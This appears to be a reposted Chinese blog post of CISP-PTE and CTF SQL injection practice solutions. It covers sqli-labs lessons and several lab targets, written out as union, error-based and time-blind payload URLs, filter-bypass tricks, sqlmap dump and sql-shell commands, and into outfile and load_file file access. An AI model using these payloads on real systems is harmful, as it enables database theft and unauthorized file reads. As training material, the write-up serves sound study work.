【CISP

2023-07-07 21:22| 来源: 网络整理| 查看: 265

文章目录【CISP-PTE】SQL注入练习题1. 今年的春节，不同往年1.1 手工注入1.2 sqlmap 注入 2.文章发布系统3. 文章发布系统24. [第一章 web入门]SQL注入-15.sqlilabs 1-156 宽字节注入 [极客大挑战 2019]HardSQL 17. sql 文件读取

【CISP-PTE】SQL注入练习题 1. 今年的春节，不同往年

http://140.210.203.168:28881

1.1 手工注入

题目明确提示过滤了注释符 # –

通过单引号闭合，并注释绕过闭合 http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=1

回显sql

select * from Article where uuid = '983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1'

闭合

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1

闭合成功 2. 爆列逐一尝试

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5 or 1='1 http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5,6 or 1='1

发现列数为6时，回显字段2 3. 爆库

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,database(),3,4,5,6 or 1='1

爆出库名为 web 4. 爆表

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='2web'),3,4,5,6 or 1='1

爆出有两个表 Article IS_KEY 5. 爆表is_key的列

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='2web' and table_name='IS_KEY'),3,4,5,6 and 1='1

爆出列为haha 6. 爆字段

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(haha) from IS_KEY ),3,4,5,6 and 1='1

得到key1:abcd1234

1.2 sqlmap 注入注入 python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 爆库 python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 --current-db 爆表 python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web --tables 爆列 python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY --columns 爆字段 python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY -C"haha" --dump 2.文章发布系统

http://140.210.203.168:17111/admin.php sqlmap注入爆库

python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 --current-db

爆表

python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 -D 2web --tables

爆列

python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 -D 2web -T users1 --columns

爆字段

python sqlmap.py -u “http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4” --risk 3 --level 5 -D 2web -T users1 -C“XremarkX4354” --dump 3. 文章发布系统2

sqlmap注入并执行sql-shell http://118.195.198.108:20000 注册用户发布文章抓包保存为sql.txt sqlmap爆库

python sqlmap.py -r sql.txt --risk 3 --level 5 --current-db

爆表

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web --tables

爆列

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 --columns

爆字段

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 -C“username,ox3a,password” --dump

发现无法爆出字段总结已获得的信息库 2web 表 users1 列 username password sqlmap执行sql shell

python sqlmap.py -r sql.txt --sql-shell select * from 2web.users1 limit 1 或者 select * from 2web.users1 where username='admin'

或者直接sqlmap执行sql

python sqlmap.py -r sql.txt -sql-query="select * from 2web.users1 limit 1" 4. [第一章 web入门]SQL注入-1

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81 union联合注入闭合

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 #

发现# 被过滤

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 %23 http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 --+ %23 和--+未被过滤闭合成功

爆列

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 30 --+ http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 3 --+

爆出列数为3

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' union select 1,2,3 --+

得到字段列数为3 回显

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,2,3 --+

爆库

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,database(),3 --+ 得到库名 note

爆表

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='note'),3 --+

得到两张表 fl4g,notes 爆字段

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='note' and table_name='fl4g'),3 --+

得到字段名为 fllllag

爆字段值

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(fllllag) from fl4g),3 and 1=1 --+

得到 flag n1book{union_select_is_so_cool}

5.sqlilabs 1-15

updatexml extractvalue

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1

闭合

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1 and 1=1 %23

#被过滤报错注入爆库

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1) %23

爆表

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1) %23

发现一次只能回显1行，用limit逐一爆

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1) %23

emails

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 2,1)),1) %23

uagents

users

referers

为空说明只有四个表报字段

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1)),1) %23 http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 1,1)),1) %23 http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 2,1)),1) %23

爆出三个字段 id username password 爆字段内容 http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users limit 0,1)),1) %23 XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'

发现回显内容被截取，结果显示不全，参考文档 https://www.wolai.com/ctfhub/qXx5vurg8fRgasaZAVDo8W MID()函数用于从文本字段中提取字符。 SELECT MID(column_name,start[,length]) FROM table_name;

Less-1 字符型注入 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-1/?id=1’ order by 5 --+Less-2 数字型注入 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-2/?id=1 order by 5less-3 ‘)闭合 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-3/?id=1’) --+less-4 “)闭合 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-4/?id=1”) --+Less-5 报错注入 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-5/?id=1’ and updatexml(1,concat(1,database()),1) --+ http://node2.anna.nssctf.cn:28656/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select email_id from emails limit 8,1)),1) --+Less-6 报错注入 “闭合 http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-6/?id=1” and updatexml(1,concat(0x7e,database()),1)–+Less-7 outfile Less-7/?id=-1’ union select 1,2,@@datadir – # 获取数据存储路径 Less-7/?id=-1’ union select 1,2,@@basedir – # 获取安装路径 Less-7/?id=1’)) union select 1,2,3 into outfile “C:\phpStudy\WWW\sqli\Less-7\test.txt” – # sqlmap --slq-shellLess-8 布尔盲注 sqlmapLess-9 时间盲注 sqlmap ?id=1’ and sleep(5) – - #延迟5s ?id=1‘’ and sleep(5) – - ?id=1 and sleep(5) – - ?id=1‘) and sleep(5) – - ?id=1‘‘) and sleep(5) – - ?id=1’ and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)=‘i’,sleep(3),1)-- -Less-10 时间盲注 sqlmap ?id=1” and sleep(5) --+Less-11 报错注入 ’ and updatexml(1,concat(0x7e,database()),0) #Less-12 闭合判断 ") union select database(),2 #Less-13 闭合判断 1’) or 1=1 # 1’) and updatexml(1,concat(0x7e,(select database()),0x7e),1)#Less-14 闭合判断 1“ or 1=1 # 1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)# 6 宽字节注入 [极客大挑战 2019]HardSQL 1 http://8c4f169a-d2ef-4cdd-bd7f-74431c549dcc.node4.buuoj.cn:81/check.php?username=1&password=1%27or(updatexml(1,concat(0x7e,database()),1))%23 7. sql 文件读取

http://192.168.213.22:81 通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。注入判断

http://192.168.213.22:81/vulnerabilities/fu1.php?id=1' 报错，存在注入点，回显sql select * from article where id= ('1'') 闭合 --+ # 均被过滤 ;%00 闭合成功 http://192.168.213.22:81/vulnerabilities/fu1.php?id=1');%00 或者（空格被过滤用/**/或者%0a） http://192.168.213.22:81/vulnerabilities/fu1.php?id=1') /**/or/**/1=('1 爆字段个数 http://192.168.213.22:81/vulnerabilities/fu1.php?id=1') /**/order//by/**/4;%00 union回显 union被过滤双写绕过 http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1') //ununionion//select/**/1,2,3,4;%00 读取key文件 key:8b3h4a7v http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1') //ununionion//select/**/1,2,3,load_file("/tmp/360/key");%00

【本文地址】

【CISP

【CISP

今日新闻

推荐新闻